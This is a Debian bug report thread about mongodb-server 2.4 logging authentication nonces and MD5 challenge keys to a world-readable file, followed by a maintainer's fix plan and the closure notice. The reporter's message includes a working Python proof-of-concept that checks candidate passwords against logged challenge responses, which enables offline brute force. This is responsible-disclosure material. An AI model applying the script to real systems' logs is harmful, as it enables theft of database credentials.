bruteforcable challenge responses in unprotected logfile

Debian Bug report logs - #833087
bruteforcable challenge responses in unprotected logfile

Toggle useless messages

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: kpcyrd <kpcyrd@rxv.cc>

To: submit@bugs.debian.org

Subject: bruteforcable challenge responses in unprotected logfile

Date: Sun, 31 Jul 2016 17:54:25 +0000

Package: mongodb-server
Version: 2.4.10-5
Severity: grave
Tags: security

There's a bugfix[1] from 2013 for an issue that wasn't announced for
security that's currently not included in debian stable.

[1]: https://jira.mongodb.org/browse/SERVER-9476

Current mongodb in stable logs authentication attempts like this:

	Sat Jul 30 21:57:08.657 [initandlisten] connection accepted from 127.0.0.1:62883 #9 (1 connection now open)
	Sat Jul 30 21:57:16.677 [conn9]  authenticate db: test { authenticate: 1, nonce: "7222f1306039344e", user: "foo", key: "84bed68ebbe64358e836186f95315328" }
	Sat Jul 30 21:57:16.677 [conn9] auth: couldn't find user foo@test, test.system.users
	Sat Jul 30 21:57:18.385 [conn9] end connection 127.0.0.1:62883 (0 connections now open)

The logfile is world readable for all local users on a default
installation. The above snippet maps to a login attempt as foo:bar.

key= is the resulting md5 hash of a function that takes nonce=, user=
and password as parameters

Below is a script that's able to take the parameters from the logfile
and verify if a given password was used for authentication, making it
suitable for offline bruteforce. (results may vary depending on password
quality, of course)

```
#!/usr/bin/env python3
'''
Login attempt with foo:bar

Sat Jul 30 21:57:08.657 [initandlisten] connection accepted from 127.0.0.1:62883 #9 (1 connection now open)
Sat Jul 30 21:57:16.677 [conn9]  authenticate db: test { authenticate: 1, nonce: "7222f1306039344e", user: "foo", key: "84bed68ebbe64358e836186f95315328" }
Sat Jul 30 21:57:16.677 [conn9] auth: couldn't find user foo@test, test.system.users
Sat Jul 30 21:57:18.385 [conn9] end connection 127.0.0.1:62883 (0 connections now open)

$ ./mongobrute.py 7222f1306039344e foo 84bed68ebbe64358e836186f95315328 bar
[+] Password matches challenge key: b'bar'
$
'''
from hashlib import md5
import sys


def createPasswordDigest(username, clearTextPassword):
    return md5(username + b':mongo:' + clearTextPassword).hexdigest()


def recalculateChallenge(nonce, user, password):
    digested = createPasswordDigest(user, password)
    digested_bytes = bytes(digested, 'utf-8')
    return md5(nonce + user + digested_bytes).hexdigest()


if __name__ == '__main__':
    try:
        nonce = bytes(sys.argv[1], 'utf-8')
        user = bytes(sys.argv[2], 'utf-8')
        key = sys.argv[3]
        password = bytes(sys.argv[4], 'utf-8')
    except IndexError:
        print('Usage: %s <nonce> <user> <key> <password-to-verify>' % sys.argv[0], file=sys.stderr)
        exit(2)

    challenge = recalculateChallenge(nonce, user, password)

    if challenge == key:
        print('[+] Password matches challenge key: %r' % password)
    else:
        print('[-] Password does not match challenge key: %r' % password)
        exit(1)
```

This is a slightly modified version of the mail I sent to security@ for
responsible disclosure and got the go-ahead to post it on the public
bugtracker.

This got fixed with f85ceb1 by upstream (released in 2.5.4), stretch
isn't affected.

Thanks.

Message #20 received at 833087@bugs.debian.org (full text, mbox, reply):

From: Ola Lundqvist <ola@inguza.com>

To: Jérémy Lal <kapouer@melix.org>, "Laszlo Boszormenyi (GCS)" <gcs@debian.org>, Debian LTS <debian-lts@lists.debian.org>, 833087@bugs.debian.org, 832908@bugs.debian.org

Subject: Security update of mongodb

Date: Wed, 3 Aug 2016 23:32:02 +0200

[Message part 1 (text/plain, inline)]

Hi Jérémy, Laszlo and LTS team

You have probably seen my latest emails about "Bug#832908: mongodb:
CVE-2016-6494: world-readable .dbshell history file: LTS update and upgrade
handling".

I have now prepared a security update of this CVE-2016-6494 and in addition
to that TEMP-0833087-C5410D.

For https://security-tracker.debian.org/tracker/CVE-2016-6494 you can find
the patch in bug 832908.

For https://security-tracker.debian.org/tracker/TEMP-0833087-C5410D I could
not easily backport the fix for sid as the code was considerably different.
So I made a simpler solution. The upstream fix was to mangle only the the
sensitive data. In wheezy I replaced the whole sensitive string with XXX.
This means that the logging is not that good anymore but this should not
impact any application functionality. I do not think most people will
notive this anyway so I think it is safe.

Upstream fix looks something like this in the logs:
Tue Aug  2 11:41:13 [conn4]  authenticate: { authenticate: 1.0, user:
"foo", nonce: "XXXX", key: "XXXX" }

My fix looks like this:
Wed Aug  3 21:18:52 [conn1]  authenticate: XXXX

I made the short-cut as I do not think it is worth the effort to do a full
back-port.

You can find the debdiff here:
http://apt.inguza.net/wheezy-security/mongodb/mongodb.debdiff

And the prepared package here:
http://apt.inguza.net/wheezy-security/mongodb/

Regarding testing I have done a simple regression test bu installing the
new packages, checking that the database is there and that I can access the
server.

I have also been able to reproduce both issues and been able to verify that
both fixes do really solve the problem.

If I do not hear any objections I will upload the corrected packages in
four (4) days, that is on Sunday (maybe on monday after).

Best regards

// Ola

-- 
 --- Inguza Technology AB --- MSc in Information Technology ----
/  ola@inguza.com                    Folkebogatan 26            \
|  opal@debian.org                   654 68 KARLSTAD            |
|  http://inguza.com/                Mobile: +46 (0)70-332 1551 |
\  gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9  /
 ---------------------------------------------------------------

[Message part 2 (text/html, inline)]

Message #31 received at 833087-close@bugs.debian.org (full text, mbox, reply):

From: Apollon Oikonomopoulos <apoikos@debian.org>

To: 833087-close@bugs.debian.org

Subject: Bug#833087: fixed in mongodb 1:2.4.10-5+deb8u1

Date: Sun, 12 Feb 2017 22:47:09 +0000

Source: mongodb
Source-Version: 1:2.4.10-5+deb8u1

We believe that the bug you reported is fixed in the latest version of
mongodb, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 833087@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Apollon Oikonomopoulos <apoikos@debian.org> (supplier of updated mongodb package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Wed, 11 Jan 2017 11:17:56 +0200
Source: mongodb
Binary: mongodb mongodb-server mongodb-clients mongodb-dev
Architecture: source
Version: 1:2.4.10-5+deb8u1
Distribution: jessie
Urgency: medium
Maintainer: Laszlo Boszormenyi (GCS) <gcs@debian.org>
Changed-By: Apollon Oikonomopoulos <apoikos@debian.org>
Description:
 mongodb    - object/document-oriented database (metapackage)
 mongodb-clients - object/document-oriented database (client apps)
 mongodb-dev - object/document-oriented database (development)
 mongodb-server - object/document-oriented database (server package)
Closes: 832908 833087
Changes:
 mongodb (1:2.4.10-5+deb8u1) jessie; urgency=medium
 .
   * Redact key and nonce from auth attempt logs (Closes: #833087)
   * Backport patch for CVE-2016-6494 from 2.6 (Closes: #832908)
Checksums-Sha1:
 6ed2b5928e8ed601c25fc19b3efee6dc77d9437a 2811 mongodb_2.4.10-5+deb8u1.dsc
 0105e9282795ed9d780ae5efb6586c9108f0180b 57220 mongodb_2.4.10-5+deb8u1.debian.tar.xz
Checksums-Sha256:
 7c5b1ec310c3167e8cb2f29b62ac625dc1f5432d0ecbe42d92d08aa496cf4a92 2811 mongodb_2.4.10-5+deb8u1.dsc
 9db03eb4de977a690e679edac9a5c0810c11fd15865b3faa203fea3c6cd12b21 57220 mongodb_2.4.10-5+deb8u1.debian.tar.xz
Files:
 f8ee704885bbc85b0ac04d76123c9d43 2811 database optional mongodb_2.4.10-5+deb8u1.dsc
 60bf0e4460a40674ecfd605f2f407381 57220 database optional mongodb_2.4.10-5+deb8u1.debian.tar.xz

-----BEGIN PGP SIGNATURE-----

iQJHBAEBCAAxFiEEPgL9ZlYpWVIRC6uZ9RsYxyAkgiQFAliOgIMTHGFwb2lrb3NA
ZGViaWFuLm9yZwAKCRD1GxjHICSCJFYFD/wJsjZgINOyyHkQstXNQfhtL0yLeG0s
xNAwwP1wAuU/UFkxI77F5yWzHV257Gt5ow/VqaYELkQtftjjjwZMG6LSCcE+Vzk/
yPKGZW2kvPk/K9wrrQiyRmgNc7+IZNdgtC0L68HiH4rZGGhh/E4b1OGgxubmxuBN
Af/aFm3/Yz/kPSkrFmxPm703zYvDrJMcnZA5fCA0WWHnTzA06icqDU6CNt/GM+nB
FjnVzqmewT0NFIFQtBdpPCrJOklYvu9qym2x5zo3rkX8CxVMIIJkFrAbFpVVxMDf
OHJrWtH76sstrgh72FETXnlwM4zbh0liHPgfeN+VuIewvOX8xlNZQvtrCrGLO+UH
4kP4Gaj2NaTcofdPE6cbHsV5HT26y/GwcSmRijyvViemsXrUSEcy8jcLwYwUu3YP
XWCxUNjkRBUwZ2OsqWznZGgKg3wr6WzjuGGYAF2o1GnwyjwGp+EYsfvAFLZZ2Eup
a/IebuSFIUVYbcPz9Z3keV/gIr9zaDCk5LdzXqnjtgfuGPnhIuP6dAblTSyue4q2
ZjiGiE1vAnP50Q0ZLkLSSEwxGLIowjm9j5IoX36JPwooZZ74rCDNH1rfaSYAgaMh
SgyVI71LB60nvgP6UKW3OLtOKnCridEcluCGxzwnLkUedHhBSoGzopLCS/H4TPhS
K1R5m7Nus8AR4A==
=Fa3Z
-----END PGP SIGNATURE-----

Send a report that this bug log contains spam.